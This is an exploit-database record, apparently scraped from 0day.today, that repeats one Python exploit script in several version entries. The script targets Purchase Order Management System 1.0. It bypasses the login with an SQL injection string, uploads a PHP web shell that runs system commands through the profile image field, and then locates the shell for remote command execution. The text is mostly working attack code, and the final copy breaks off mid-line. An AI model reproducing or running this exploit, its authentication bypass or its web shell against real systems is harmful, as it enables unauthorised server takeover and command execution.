https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-30] #"}, "lastseen": "2021-09-29T22:42:49", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "31d2407d745e52713437daff8b708b55", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-01T00:37:29", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-01] #"}, "lastseen": "2021-10-01T00:37:29", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "a9a9ba5039dda2b7467609ab553b4818", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-01T22:37:03", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-02] #"}, "lastseen": "2021-10-01T22:37:03", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "aea6cf70ecc1c6a796850bfd46fc5764", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-02T22:34:14", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-03] #"}, "lastseen": "2021-10-02T22:34:14", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "f3fdd957b7745296991b6acfd1cb4c46", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-04T06:41:49", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:45", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-25T00:40:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-04] #"}, "lastseen": "2021-10-04T06:41:49", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "21604183f1be0639be2cc29903743fea", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-05T00:30:37", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-05T00:30:37", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-05T00:30:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + 